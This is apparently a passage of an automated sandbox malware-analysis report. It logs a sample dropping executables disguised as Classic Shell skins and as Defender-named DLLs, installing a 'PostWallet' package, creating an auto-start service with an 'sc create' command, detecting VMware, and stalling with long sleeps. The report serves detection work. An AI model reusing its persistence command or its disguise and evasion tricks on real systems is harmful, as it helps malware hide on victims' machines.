          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicShellUpdate.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIEDLL_32.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vcruntime140.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIE_32.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicStartMenu.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\MsMpLics.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicExplorer64.dllJump to dropped file
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\EppManifest.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\PostWallet\Update.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeFile created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metro.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.logJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicShellReadme.rtfJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, IncJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\Start Menu Settings.lnkJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00345C70 Warning,Warning,GetLastError,Warning,Warning,Warning,GetLastError,Warning,Warning,StartServiceW,GetLastError,Warning,GetTickCount,QueryServiceStatus,GetTickCount,GetTickCount,Sleep,QueryServiceStatus,GetLastError,Warning,Warning,Warning,3_2_00345C70
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D16732C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_6D16732C
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Contain functionality to detect virtual machines
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware Workstation VMware 3_2_00342450
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx-stats.exe vmware-vmx-stats.exe 3_2_003420B0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx-stats.exe VMware 3_2_00342480
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx.exe vmware-vmx.exe 3_2_00344D00
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware Server Console VMware Server Console 3_2_00343360
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: vmware-vmx.exe vmware-vmx.exe vmware-vmx-debug.exe vmware-vmx-stats.exe vmware-vmx-debug.exe vmware-vmx-debug.exe 3_2_00341FB0
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware Authorization Service VMware Authorization Service 3_2_00343F80
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: VMware VMware VMware 3_2_00342DF0
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: 2460000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: 1A6C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Users\user\Desktop\VMware Workstation.lnkJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile opened / queried: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnkJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeFile opened / queried: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.DLLJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 1784Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 790Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicExplorer32.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicExplorerSettings.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIE_64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Metro.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicShellUpdate.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIEDLL_32.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIE_32.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicStartMenu.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\MsMpLics.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicExplorer64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIE_64.exeJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\EppManifest.dllJump to dropped file
          Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to dropped file
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-35717
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeAPI coverage: 1.7 %
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 6976Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 7040Thread sleep count: 1784 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 7040Thread sleep count: 790 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 6856Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00415080 FindFirstFileW,FindClose,12_2_00415080
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeCode function: 0_2_00619ED6 VirtualQuery,GetSystemInfo,0_2_00619ED6
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQuery_VMCI
          Source: FilePost?a.exe.2.drBinary or memory string: CompanyNameVMware, Inc.b
          Source: Update.exe, 00000002.00000002.1680892254.000000000291A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: LIB/NET48/VMWAREBASE.DLL
          Source: FilePost?a.exeBinary or memory string: \\.\pipe\vmware-authdpipe
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetWriteAccess
          Source: FilePost?a.exe.2.drBinary or memory string: http://www.vmware.com/0
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Workstation.lnk
          Source: FilePost?a.exe.2.drBinary or memory string: name="VMware.VMware.vmauthd"
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetNumaNode
          Source: FilePost?a.exe.2.drBinary or memory string: PANIC: %s599 vmware-authd PANIC: %s
          Source: PostWallet-1.0.0-full.nupkgBinary or memory string: Rlib/net48/vmwarebase.dll
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetTags
